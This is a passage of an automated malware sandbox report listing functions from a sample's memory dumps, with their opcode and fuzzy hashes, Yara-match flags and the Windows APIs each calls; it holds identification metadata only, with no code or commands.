                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                                • Instruction ID: 7a97e9b117f47accb4cbf8c8560be897060806208c36f25f9f8edba7fd129647
                                                                                • Opcode Fuzzy Hash: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                                                • Instruction Fuzzy Hash: C801DFF5B8034147EB30AE10C4C0B7BF2AAAF80B08F18443CC91947600DB72F815DAA9
                                                                                Function 004248E0 Relevance: .1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                                • Instruction ID: 20b21e30a0ec0fb2c99107143c2b9476f8de25489f108ff1004ace05f2c41b4d
                                                                                • Opcode Fuzzy Hash: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                                                • Instruction Fuzzy Hash: DB0192F9B0071147E620AF25F8C1727A2A89BC1718F58483EE84457342DB7DEC44C6A9
                                                                                Function 004381BB Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                                • Instruction ID: 834250698d5e0500e56c7bb278610784be947653ec03dbaf781bc3f884b91dae
                                                                                • Opcode Fuzzy Hash: f95921265e9851a63917028a6ef760884a350e0ab274218a1fd4096a17488e74
                                                                                • Instruction Fuzzy Hash: 2A1134B01083458BD714CF51C1A066BF7E1FF89788F14995EE4D19B251D7BCD909CB8A
                                                                                Function 02100918 Relevance: .0, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction ID: 600bd15b199e3bf62a349a8e59f6aef1bbfc425441a19cab7060a37024eb71d3
                                                                                • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction Fuzzy Hash: 6611F5746493808BE324CF14C8A4B9FFBF1BF86304F044A1CE5858B290D7BA9805CB86
                                                                                Function 004106B1 Relevance: .0, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction ID: 889cefc2f7097b9c6db9ab6823b190a93607d6c31bc0b71ec5331936f27af802
                                                                                • Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
                                                                                • Instruction Fuzzy Hash: A711F5746093808BE324DF14C8A4B9FFBF1BB86304F044A2DE5959B2D1D7BA9845CF86
                                                                                Function 020FFE1B Relevance: .0, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction ID: 2f3728004df68d86a82bdd5c6212a60de738535feb80330ed44325e661de94f3
                                                                                • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction Fuzzy Hash: D91180701883C28BD335CF14D864BEFB7E1BBC6345F48182CD89987682D37984518F46
                                                                                Function 0040FBB4 Relevance: .0, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
                                                                                • Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
                                                                                • Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A
                                                                                Function 0212917C Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction ID: 74c9d6d58c9ec79dbfd0dff2334efa0ab04d4f0d2eaee6ca44a31488e629a305
                                                                                • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction Fuzzy Hash: 8FE04FBE9512B08BCB688F25D891572B7B0FB43E54B59501DE446E7250D730EC14CB06
                                                                                Function 00438F15 Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
                                                                                • Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
                                                                                • Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A
                                                                                Function 021112E0 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                                • Instruction ID: 2cfabecc1360f204e1c0b0afaa681f2d052b7128f6197a5654aa0f941d3e7788
                                                                                • Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
                                                                                • Instruction Fuzzy Hash: 3FE0C2546A898387C70E8E299470337F7E95F0320AF2891B9D9DACB841F735E0408704
                                                                                Function 020FCD77 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction ID: 08e37b753f3c71e9038c2810a26806bc0d2028da37449bade091ce08f7a4a47c
                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction Fuzzy Hash: 56D097625883A40E6BC9CD3804A083BFFE4E943512F08108FE0C1E3405C320D8019398
                                                                                Function 0040CB10 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction ID: 15f5a020169ecd94f448affbf7eac2585d4a5225e6d21b45986e377c0b9b8dd8
                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction Fuzzy Hash: 52D0A7715487A14ED7588E3824E157BFBF8E947612B1825AFE4D1F3245D234EC01879D
                                                                                Function 00503F97 Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 004FE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_4fe000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                                                • Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
                                                                                • Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                                                • Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21
                                                                                Function 0210D097 Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                                                • Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
                                                                                • Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                                                • Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C
                                                                                Function 0210CF1A Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                                                • Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
                                                                                • Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                                                • Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D
                                                                                Function 0211EEF7 Relevance: 50.9, APIs: 4, Strings: 25, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$DeleteSelect
                                                                                • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                                                • API String ID: 618127014-763545205
                                                                                • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                                • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                                Function 0211ED17 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                                                • String ID: @$A$C$F
                                                                                • API String ID: 2111159801-319984173
                                                                                • Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                                • Instruction ID: 87ff81332ac758d4626db08b615a9cd7b3b43ae1a524f2b385b8411a688f3b3f
                                                                                • Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
                                                                                • Instruction Fuzzy Hash: 1851577050D380CFC750DFA8948875EBFE1AB96224F540E2EF8E587291D3358549CB53
                                                                                Function 0210D207 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0210D307
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0210D334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                                • Instruction ID: b5795840258f96bd972c89566b46361be4c95085b2368e3bbee9752a8c2202c1
                                                                                • Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
                                                                                • Instruction Fuzzy Hash: E8617BB16483418FD328CF14C8A0BABB7E5EFC6318F054A1DE8D65B381E7B49905CB96
                                                                                Function 0210D205 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0210D307
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0210D334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                                • Instruction ID: 69eff6ef2b079232bf54a60dfa0325de216a1a292aab62f1f8e70129ac3df441
                                                                                • Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                                • Instruction Fuzzy Hash: 4F616B716483418FD328CF14C8A0BABB7E1EFC6318F054A1DE8D65B281D7B49905CB96
                                                                                Function 0210DB47 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0210DC71
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0210DCA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: eI.K$qs
                                                                                • API String ID: 237503144-3936219367
                                                                                • Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                                • Instruction ID: 30ba9916febf62f3f46d9399790d5b62e6550e162382778cbe2daf0d8ecee82f
                                                                                • Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                                • Instruction Fuzzy Hash: 4F5145B0100B049BD7348F26C894BA7BBB5FB45314F544A1CE8A64FB85D7B5F409CB94
                                                                                Function 020F9107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 020F9145
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                                • API String ID: 621844428-2804141084
                                                                                • Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                                • Instruction ID: 2d25f49a32ac4fbde775900db8a979ccd57fd2250b43cc6e0f6bf38dcd71dd65
                                                                                • Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                                • Instruction Fuzzy Hash: 68F01D74CC870A8ECBD4BFB1954D3AE7BE9BF11310F004A3AD69681990DB34804AEE53
                                                                                Function 02103415 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02103AEB
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02103B1C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: V"
                                                                                • API String ID: 237503144-2019076553
                                                                                • Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                                • Instruction ID: 1ac2d8000742cb09facc2153db43a0990fd9fb4d703933def361a1b8ce9a0d79
                                                                                • Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                                • Instruction Fuzzy Hash: 0FE13AB05883828BD335CF14C894BEFBBE1BFC4315F48496DE8A987291D7BA55458F82
                                                                                Function 004131AE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: V"
                                                                                • API String ID: 237503144-2019076553
                                                                                • Opcode ID: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                                                • Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
                                                                                • Opcode Fuzzy Hash: 856c4f6a3e30eb9153f14b8215bba94b29a403e190c90c0dbe90c268fa1ef07e
                                                                                • Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96
                                                                                Function 0211BB99 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: /$_
                                                                                • API String ID: 2568140703-3328996620
                                                                                • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                                • Instruction ID: 78a2a0eb960d9b9415e783870e043a577cedb6c1acfa17b4ace27f2dc93d5ee3
                                                                                • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                                • Instruction Fuzzy Hash: E4A1A172A4D7818FD7398A28C8903DFBBD2ABD5324F194A6CD4E9873D1DB358941CB42
                                                                                Function 0042B932 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SysStringLen.OLEAUT32 ref: 0042B93C
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeapString
                                                                                • String ID: /$_
                                                                                • API String ID: 983180023-3328996620
                                                                                • Opcode ID: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                                                • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                                                • Opcode Fuzzy Hash: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                                                • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                                                Function 0211AC76 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: /$_
                                                                                • API String ID: 2568140703-3328996620
                                                                                • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                                • Instruction ID: 7869de5d757b1fa23bf47849b3a24402a776a5459d88906391edd4d88208ab19
                                                                                • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                                • Instruction Fuzzy Hash: 579197726497818FC739CE28C4507DABBE2AFD5314F194A6DD4E9873D1DB369801CB42
                                                                                Function 0042AA0F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeapString
                                                                                • String ID: /$_
                                                                                • API String ID: 983180023-3328996620
                                                                                • Opcode ID: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                                                • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                                                • Opcode Fuzzy Hash: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
